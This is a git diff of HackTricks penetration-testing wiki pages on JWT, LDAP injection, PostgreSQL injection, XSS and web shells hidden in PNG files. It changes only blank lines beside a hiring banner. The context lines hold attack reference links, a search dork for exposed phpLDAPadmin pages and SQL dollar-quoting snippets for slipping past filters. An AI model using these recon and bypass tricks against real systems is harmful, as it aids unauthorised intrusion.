@@ -14,7 +14,7 @@ Other ways to support HackTricks:
-
+
If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_).
@@ -340,7 +340,7 @@ More information in: [https://medium.com/swlh/polyglot-files-a-hackers-best-frie
* [https://www.idontplaydarts.com/2012/06/encoding-web-shells-in-png-idat-chunks/](https://www.idontplaydarts.com/2012/06/encoding-web-shells-in-png-idat-chunks/)
* [https://medium.com/swlh/polyglot-files-a-hackers-best-friend-850bf812dd8a](https://medium.com/swlh/polyglot-files-a-hackers-best-friend-850bf812dd8a)
-
+
If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_).
diff --git a/pentesting-web/hacking-jwt-json-web-tokens.md b/pentesting-web/hacking-jwt-json-web-tokens.md
index 812809be6e1..c057ec09f6f 100644
--- a/pentesting-web/hacking-jwt-json-web-tokens.md
+++ b/pentesting-web/hacking-jwt-json-web-tokens.md
@@ -14,7 +14,7 @@ Other ways to support HackTricks:
-
+
If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_).
@@ -279,7 +279,7 @@ The token's expiry is checked using the "exp" Payload claim. Given that JWTs are
{% embed url="https://github.com/ticarpi/jwt_tool" %}
-
+
If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_).
diff --git a/pentesting-web/ldap-injection.md b/pentesting-web/ldap-injection.md
index d8bb6c987c1..1a7d443ecb0 100644
--- a/pentesting-web/ldap-injection.md
+++ b/pentesting-web/ldap-injection.md
@@ -16,7 +16,7 @@ Other ways to support HackTricks:
-
+
If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_).
@@ -235,7 +235,7 @@ intitle:"phpLDAPadmin" inurl:cmd.php
{% embed url="https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/LDAP%20Injection" %}
-
+
If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_).
diff --git a/pentesting-web/sql-injection/postgresql-injection/README.md b/pentesting-web/sql-injection/postgresql-injection/README.md
index 1807f3d1ce2..e6270f448ee 100644
--- a/pentesting-web/sql-injection/postgresql-injection/README.md
+++ b/pentesting-web/sql-injection/postgresql-injection/README.md
@@ -14,7 +14,7 @@ Other ways to support HackTricks:
-
+
If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_).
@@ -106,7 +106,7 @@ SELECT $$hacktricks$$;
SELECT $TAG$hacktricks$TAG$;
```
-
+
If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_).
diff --git a/pentesting-web/xss-cross-site-scripting/README.md b/pentesting-web/xss-cross-site-scripting/README.md
index 831d155370f..01f3e1c10db 100644
--- a/pentesting-web/xss-cross-site-scripting/README.md
+++ b/pentesting-web/xss-cross-site-scripting/README.md
@@ -1,6 +1,6 @@
# XSS (Cross Site Scripting)
-
+
If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_).
@@ -1544,7 +1544,7 @@ Find **more SVG payloads in** [**https://github.com/allanlw/svg-cheatsheet**](ht
* [https://gist.github.com/rvrsh3ll/09a8b933291f9f98e8ec](https://gist.github.com/rvrsh3ll/09a8b933291f9f98e8ec)
* [https://netsec.expert/2020/02/01/xss-in-2020.html](https://netsec.expert/2020/02/01/xss-in-2020.html)
-
+
If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_).